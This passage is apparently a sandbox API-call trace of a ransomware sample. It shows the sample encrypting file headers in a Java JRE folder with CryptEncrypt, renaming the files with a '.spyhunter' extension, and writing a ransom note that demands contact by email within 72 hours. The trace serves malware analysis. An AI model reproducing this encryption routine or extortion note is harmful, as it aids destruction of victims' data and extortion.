lpNumberOfBytesWritten=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e4d4*=0x9b, lpOverlapped=0x0) returned 1 [0173.679] GetProcessHeap () returned 0x2c0000 [0173.679] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0173.679] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.679] WriteFile (in: hFile=0xa0, lpBuffer=0x270e514*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x270e514*, lpNumberOfBytesWritten=0x270e4d4*=0x4, lpOverlapped=0x0) returned 1 [0173.680] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4d4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4d4*=0x30, lpOverlapped=0x0) returned 1 [0173.680] CloseHandle (hObject=0xa0) returned 1 [0173.680] GetProcessHeap () returned 0x2c0000 [0173.680] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.680] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.spyhunter") returned 75 [0173.680] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\lib\\accessibility.properties.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\lib\\accessibility.properties.spyhunter")) returned 1 [0173.681] GetProcessHeap () returned 0x2c0000 [0173.681] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.681] GetProcessHeap () returned 0x2c0000 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0173.682] GetProcessHeap () returned 0x2c0000 [0173.682] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03818 | out: hHeap=0x2c0000) returned 1 [0173.682] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e510 | out: pbBuffer=0x270e510) returned 1 [0173.682] GetProcessHeap () returned 0x2c0000 [0173.682] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0173.682] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e508*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e508*=0x30) returned 1 [0173.682] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0173.683] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll") returned 51 [0173.683] StrStrW (lpFirst="unpack.dll", lpSrch=".txt") returned 0x0 [0173.683] GetProcessHeap () returned 0x2c0000 [0173.683] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c39fe0 [0173.683] ReadFile (in: hFile=0xa0, lpBuffer=0x2c39fe0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesRead=0x270e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.715] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.715] WriteFile (in: hFile=0xa0, lpBuffer=0x2c39fe0*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c39fe0*, lpNumberOfBytesWritten=0x270e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.715] GetProcessHeap () returned 0x2c0000 [0173.715] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c39fe0 | out: hHeap=0x2c0000) returned 1 [0173.715] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.715] WriteFile (in: hFile=0xa0, lpBuffer=0x270e50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x270e50c*, lpNumberOfBytesWritten=0x270e4cc*=0x4, lpOverlapped=0x0) returned 1 [0173.722] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4cc*=0x30, lpOverlapped=0x0) returned 1 [0173.722] CloseHandle (hObject=0xa0) returned 1 [0173.722] GetProcessHeap () returned 0x2c0000 [0173.722] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0173.722] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll.spyhunter") returned 61 [0173.722] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\unpack.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\unpack.dll.spyhunter")) returned 1 [0173.724] GetProcessHeap () returned 0x2c0000 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0173.724] GetProcessHeap () returned 0x2c0000 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0173.724] GetProcessHeap () returned 0x2c0000 [0173.724] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c21d00 | out: hHeap=0x2c0000) returned 1 [0173.724] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e510 | out: pbBuffer=0x270e510) returned 1 [0173.724] GetProcessHeap () returned 0x2c0000 [0173.724] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0173.724] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e508*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e508*=0x30) returned 1 [0173.724] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunmscapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0173.725] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll") returned 54 [0173.725] StrStrW (lpFirst="sunmscapi.dll", lpSrch=".txt") returned 0x0 [0173.725] GetProcessHeap () returned 0x2c0000 [0173.725] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0173.725] ReadFile (in: hFile=0xa0, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x270e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.914] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0173.914] WriteFile (in: hFile=0xa0, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x270e4cc*=0x2800, lpOverlapped=0x0) returned 1 [0173.914] GetProcessHeap () returned 0x2c0000 [0173.914] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0173.914] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0173.915] WriteFile (in: hFile=0xa0, lpBuffer=0x270e50c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x270e50c*, lpNumberOfBytesWritten=0x270e4cc*=0x4, lpOverlapped=0x0) returned 1 [0174.063] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4cc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4cc*=0x30, lpOverlapped=0x0) returned 1 [0174.063] CloseHandle (hObject=0xa0) returned 1 [0174.063] GetProcessHeap () returned 0x2c0000 [0174.063] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.063] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll.spyhunter") returned 64 [0174.063] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunmscapi.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\sunmscapi.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\sunmscapi.dll.spyhunter")) returned 1 [0174.064] GetProcessHeap () returned 0x2c0000 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.064] GetProcessHeap () returned 0x2c0000 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.064] GetProcessHeap () returned 0x2c0000 [0174.064] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed34e0 | out: hHeap=0x2c0000) returned 1 [0174.064] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e508 | out: pbBuffer=0x270e508) returned 1 [0174.065] GetProcessHeap () returned 0x2c0000 [0174.065] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.065] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e500*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e500*=0x30) returned 1 [0174.065] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.065] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe") returned 55 [0174.066] StrStrW (lpFirst="policytool.exe", lpSrch=".txt") returned 0x0 [0174.066] GetProcessHeap () returned 0x2c0000 [0174.066] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.066] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4c4*=0x2800, lpOverlapped=0x0) returned 1 [0174.067] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.067] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4c4, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4c4*=0x2800, lpOverlapped=0x0) returned 1 [0174.067] GetProcessHeap () returned 0x2c0000 [0174.067] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.067] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.068] WriteFile (in: hFile=0xa0, lpBuffer=0x270e504*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4c4, lpOverlapped=0x0 | out: lpBuffer=0x270e504*, lpNumberOfBytesWritten=0x270e4c4*=0x4, lpOverlapped=0x0) returned 1 [0174.068] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4c4, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4c4*=0x30, lpOverlapped=0x0) returned 1 [0174.068] CloseHandle (hObject=0xa0) returned 1 [0174.069] GetProcessHeap () returned 0x2c0000 [0174.069] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.069] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe.spyhunter") returned 65 [0174.069] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\policytool.exe.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\policytool.exe.spyhunter")) returned 1 [0174.071] GetProcessHeap () returned 0x2c0000 [0174.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.071] GetProcessHeap () returned 0x2c0000 [0174.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.071] GetProcessHeap () returned 0x2c0000 [0174.071] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed3200 | out: hHeap=0x2c0000) returned 1 [0174.071] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\$HOWDECRYPT$.txt" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.072] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0174.072] WriteFile (in: hFile=0xa0, lpBuffer=0x270e43b*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x270e43b*, lpNumberOfBytesWritten=0x270e564*=0x127, lpOverlapped=0x0) returned 1 [0174.073] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0174.073] WriteFile (in: hFile=0xa0, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x270e564, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x270e564*=0x2ac, lpOverlapped=0x0) returned 1 [0174.074] CloseHandle (hObject=0xa0) returned 1 [0174.074] GetProcessHeap () returned 0x2c0000 [0174.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e03678 | out: hHeap=0x2c0000) returned 1 [0174.074] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e500 | out: pbBuffer=0x270e500) returned 1 [0174.074] GetProcessHeap () returned 0x2c0000 [0174.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.074] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4f8*=0x30) returned 1 [0174.074] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\npjp2.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.075] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll") returned 58 [0174.076] StrStrW (lpFirst="npjp2.dll", lpSrch=".txt") returned 0x0 [0174.076] GetProcessHeap () returned 0x2c0000 [0174.076] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.076] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.135] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.135] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.136] GetProcessHeap () returned 0x2c0000 [0174.136] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.136] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.136] WriteFile (in: hFile=0xa0, lpBuffer=0x270e4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x270e4fc*, lpNumberOfBytesWritten=0x270e4bc*=0x4, lpOverlapped=0x0) returned 1 [0174.304] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4bc*=0x30, lpOverlapped=0x0) returned 1 [0174.304] CloseHandle (hObject=0xa0) returned 1 [0174.387] GetProcessHeap () returned 0x2c0000 [0174.387] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.388] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll.spyhunter") returned 68 [0174.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\npjp2.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\plugin2\\npjp2.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\plugin2\\npjp2.dll.spyhunter")) returned 1 [0174.390] GetProcessHeap () returned 0x2c0000 [0174.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.390] GetProcessHeap () returned 0x2c0000 [0174.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.390] GetProcessHeap () returned 0x2c0000 [0174.390] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2e5f880 | out: hHeap=0x2c0000) returned 1 [0174.390] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e500 | out: pbBuffer=0x270e500) returned 1 [0174.390] GetProcessHeap () returned 0x2c0000 [0174.390] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.390] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4f8*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4f8*=0x30) returned 1 [0174.391] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\management.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.392] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll") returned 55 [0174.392] StrStrW (lpFirst="management.dll", lpSrch=".txt") returned 0x0 [0174.392] GetProcessHeap () returned 0x2c0000 [0174.392] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.392] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x270e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.393] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0174.393] WriteFile (in: hFile=0xa0, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x270e4bc*=0x2800, lpOverlapped=0x0) returned 1 [0174.393] GetProcessHeap () returned 0x2c0000 [0174.393] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0174.395] SetFilePointerEx (in: hFile=0xa0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0174.395] WriteFile (in: hFile=0xa0, lpBuffer=0x270e4fc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x270e4fc*, lpNumberOfBytesWritten=0x270e4bc*=0x4, lpOverlapped=0x0) returned 1 [0174.395] WriteFile (in: hFile=0xa0, lpBuffer=0x31f2f0*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x270e4bc, lpOverlapped=0x0 | out: lpBuffer=0x31f2f0*, lpNumberOfBytesWritten=0x270e4bc*=0x30, lpOverlapped=0x0) returned 1 [0174.395] CloseHandle (hObject=0xa0) returned 1 [0174.395] GetProcessHeap () returned 0x2c0000 [0174.395] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fb1c8 [0174.395] wnsprintfW (in: pszDest=0x2fb1c8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll.spyhunter") returned 65 [0174.395] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\management.dll"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\management.dll.spyhunter" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\management.dll.spyhunter")) returned 1 [0174.396] GetProcessHeap () returned 0x2c0000 [0174.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fb1c8 | out: hHeap=0x2c0000) returned 1 [0174.396] GetProcessHeap () returned 0x2c0000 [0174.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f2f0 | out: hHeap=0x2c0000) returned 1 [0174.396] GetProcessHeap () returned 0x2c0000 [0174.396] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ed2e68 | out: hHeap=0x2c0000) returned 1 [0174.396] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x270e4f8 | out: pbBuffer=0x270e4f8) returned 1 [0174.396] GetProcessHeap () returned 0x2c0000 [0174.396] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f2f0 [0174.396] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f2f0*, pdwDataLen=0x270e4f0*=0x20, dwBufLen=0x30 | out: pbData=0x31f2f0*, pdwDataLen=0x270e4f0*=0x30) returned 1 [0174.397] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll" (normalized: "c:\\program files (x86)\\java\\jre7\\bin\\libxslt.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xa0 [0174.397] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Java\\jre7\\bin\\libxslt.dll") returned 52 [0174.397] StrStrW (lpFirst="libxslt.dll", lpSrch=".txt") returned 0x0 [0174.397] GetProcessHeap () returned 0x2c0000 [0174.397] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0174.398] ReadFile (in: hFile=0xa0, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x270e4b4, lpOverlapped=0x0 | out: 